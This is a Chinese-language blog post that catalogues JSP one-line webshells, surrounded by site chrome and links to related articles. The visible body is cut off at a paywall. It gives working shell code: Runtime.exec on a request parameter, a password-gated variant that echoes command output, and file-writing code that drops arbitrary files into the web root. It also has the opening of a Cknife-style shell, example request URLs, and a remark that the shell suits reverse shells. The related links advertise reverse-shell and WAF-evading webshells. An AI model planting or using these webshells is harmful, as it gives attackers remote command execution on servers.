jsp一句话总结

最新推荐文章于 2024-08-27 10:14:10 发布
最新推荐文章于 2024-08-27 10:14:10 发布
阅读量5.6k 收藏 1
点赞数
分类专栏: 一句话木马 文章标签: java web jsp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45486362/article/details/106961730
版权
本文详细介绍了Java JSP中的一句话木马实现原理,包括命令执行、文件写入和反射调用外部jar包。通过Runtime类执行系统命令,FileOutputStream进行文件写入,以及利用反射加载外部jar执行操作。同时,提出了防御此类木马的方法,即禁止JSP文件中的scripting元素,以阻止已知的Java WebShell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

**

基本原理

**
由于Java中没有所谓的eval函数,无法对直接传递的代码进行解析执行。所以不管是蚁剑还是菜刀对于JSP的shell一直是采用custom模式,即把要执行的代码提前写在shell中,然后每次只需要传递要调用的函数名以及对应的参数即可。
虽然可以实现相应的功能,但是带来一个问题就是shell体积非常巨大。菜刀的jsp脚本有7kb大小,蚁剑的jsp custom脚本即使去掉注释后还有17k之多,用起来非常的不方便。
冰蝎的作者rebeyond大佬在文章 利用动态二进制加密实现新型一句话木马之Java篇 中提出了一种新的jsp一句话的实现方式:利用classloader直接解析编译后的class字节码,相当于实现了一个java的eval功能

一、命令执行

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

Runtime 类封装了运行时的环境。每个 Java 应用程序都有一个 Runtime 类实例,使应用程序能够与其运行的环境相连接。使用 getRuntime() 构建 Runtime 类实例。 getRuntime() 返回与当前 Java 应用程序相关的运行时对象。获取实例后调用 exec() 方法执行系统命令。
request 为 JSP 内置对象,getParameter() 方法获取请求参数 cmd的值构建命令 。

请求URL:http://127.0.0.1/shell.jsp?cmd=calc
没有回显,可以用来反弹shell

二、命令执行

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>
<body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
   
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
   
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>
</html>

原理与样本一相同, inputStream() 方法获取命令回显输出到前端页面中。
请求URL:http://127.0.0.1/shell.jsp?pwd=admin&cmd=calc

三、文件写入

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<%
    // ISO-8859-1 输入
    new java.io.FileOutputStream(request.getParameter("file")).write(request.getParameter("content").getBytes());
    // UTF-8 输入
    new java.io.FileOutputStream(request.getParameter("file")).write(new String(request.getParameter("content").getBytes("ISO-8859-1"), "UTF-8").getBytes());
    // Web 目录写入
    new java.io.FileOutputStream(application.getRealPath("/") + "/" + request.getParameter("filename")).write(request.getParameter("content").getBytes());
    // 功能更加丰富的写入
    new java.io.RandomAccessFile(request.getParameter("file"),"rw").write(request.getParameter("content").getBytes());
%>

new FileOutputStream(name, append) 调用 FileOutputStream 类构造函数创建文件,并写入内容。file 参数为文件全限定名,filename 为文件名,content 为文本内容。

// ISO-8859-1 输入
请求URL:http://127.0.0.1/input.jsp?file=D:/test.txt&content=test
// UTF-8 输入
请求URL:http://127.0.0.1/input.jsp?file=D:/test.txt&content=测试内容
// Web 目录写入
请求URL:http://127.0.0.1/input.jsp?filename=test.txt&content=test
// 功能更加丰富的写入
请求URL:http://127.0.0.1/input.jsp?file=D:/test.txt&content=test

四、反射调用外部jar包

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
    String Pwd = "Cknife";
    String cs = "UTF-8";
String EC(String s) throws Exception {
   
        return new String(s.getBytes("ISO-8859-1"),cs);
    }
Connection GC(String s) throws Exception {
   
        String[] x = s.trim().split("choraheiheihei");
        Class.forName(x[0].trim());
        if(x[1].indexOf("jdbc:oracle")!=-1){
   
            return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
        }else{
   
            Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
            if (x.length > 4) {
   
                c.setCatalog(x[4]);
            }
            return c;
        }
    }
void AA(StringBuffer sb) throws Exception {
   
        File k = new File("")
最低0.47元/天 解锁文章
常用的句话反弹shell总结
橘子女侠
05-20 1万+
目录 常用的句话反弹shell总结 1. bash直接反弹 2. python句话反弹shell 3. python脚本反弹shell 4. php句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取句话反弹shell 常用的句话反弹she...
「渗透」:句话木马反弹shell的思路
binaxin的博客
10-06 2360
前提:现在情况是已经上传了句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
jspshell 句话
07-24
jsp shell
jsp句话
weixin_33728268的博客
08-22 550
&lt;%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%&gt;&lt;%!String Pwd="1.2.3";String EC(String s,String c)throws Exception{return new String(s.getBytes("ISO-8859-1"),c);}Con...
JSP句话后门--2006-08-03
Quantum Intelligence
09-03 5856
...之前的原创都给人家抬走了!真郁闷.这次 在这里说明~  [转载请注名 無名氏nonamed 作品]java是 面向对象编程的语言了! 啥都是对象!基于编译与解析之间~~-_- ... 估计没有eval  execute这样功能的函数了!...但是还是可以留句话后门的 本来我想用反射实现 像 eval这样的功能.....但是失败了!郁闷!后来没有办法~~ 算了~~ 这样实现吧!
JSP句话代码
05-15
JSP句话代码
JSP句话下载代码
12-30
### JSP句话下载代码解析及应用 #### 、引言 在Web开发中,文件下载功能是非常常见且实用的项需求。特别是在企业级应用中,数据报表、文档资料等经常需要通过Web页面进行下载操作。Java Server Pages (JSP) ...
Java安全-Java Web后门学习 Jsp 句话分析
Love&Share
05-03 2726
文章目录Java Web后门句话木马反射调用类加载(冰蝎马实现方式)ELSE参考 Java Web后门 Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用 Java 中常用的命令执行函数 java.lang.Runtime.exec() java.lang.ProcessBuilder.start() 句话木马 最简单的 jsp 句话木马 <% Runtime.getRuntime().exec(request.getParameter("i"));%> .
JSP句话后门
10-31
JSP句话后门
精简&明文免杀冰蝎php句话.php
10-30
php句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
jsp句话小马
weixin_42786460的博客
09-09 1454
jsp句话小马
JSP句话小马
旺仔Sec&blog
11-13 3236
<%! class NATIVE extends ClassLoader{ NATIVE(ClassLoader c){super(c);} public Class routine(byte[] b){ return super.defineClass(b, 0, b.length); } } public byte[] runtime(String str) throws Exception { Class base64; byte[] value = null; ...
jsp句话 命令执行
最新发布
qq_43615820的博客
08-27 366
【代码】jsp句话 命令执行。
简单的jsp无关键字句话
qq_40131760的博客
05-16 723
通过ascii码与字符之间的转换,加上通过反射加载类,实现无关键字句话。
句话经典」JavaWeb中的JSP
z00238082的博客
01-24 1978
JSP内置对象及其作用: request:用户端请求,此请求会包含来自GET/POST请求的参数; response:网页传回用户端的回应; pageContext:网页的属性是在这里管理的; Session:与请求有关的会话周期; application:Servlet正在执行的内容; Out:用来传送回应的输出; Config:Servlet的架构部件; Page:JSP网页本
句话总结JSP的运行原理
sgj_4732514的专栏
12-28 276
[size=large] 学习JSP,首先要弄清楚什么是JSPJSP他不是个新的技术,而是各种技术的结合体(asp也如些),他包括了:css+div+js+servlet+jsbean+js片断等 访问JSP的过程是:如果是第次访问.jsp文件被服务器翻译成个对应的java文件(servlet),再被编译成.class文件并load到内存中。如果是以后访问jsp,那就直接调用内存...
java 菜刀_jsp句话木马菜刀
weixin_30341121的博客
02-20 6528
1.如何使用JSP句话木马和菜刀木马相信用过句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许场血雨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉水沏茶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值